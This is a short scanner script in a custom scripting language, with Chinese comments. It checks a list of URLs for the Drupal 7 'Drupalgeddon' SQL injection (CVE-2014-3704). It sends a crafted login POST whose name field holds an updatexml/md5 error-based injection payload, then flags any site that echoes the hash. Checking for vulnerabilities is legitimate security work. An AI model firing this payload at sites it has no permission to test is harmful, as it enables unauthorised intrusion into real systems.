#request urls = array
#define payload = /?q=node&destination=node
#define bug = fae0b27c451c728867a567e8c1bb4e53
#define info = 存在Drupal < 7.32 “Drupalgeddon” SQL注入漏洞（CVE-2014-3704）
#define post = pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or
updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a

function main(args)
{
	printclolor("当前正在检测:".info,1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			res = HttpPost(url.payload,post,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[0],bug,0)!= "-1")
			{
				printclolor("[+]".urls[i].info,3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
	
}
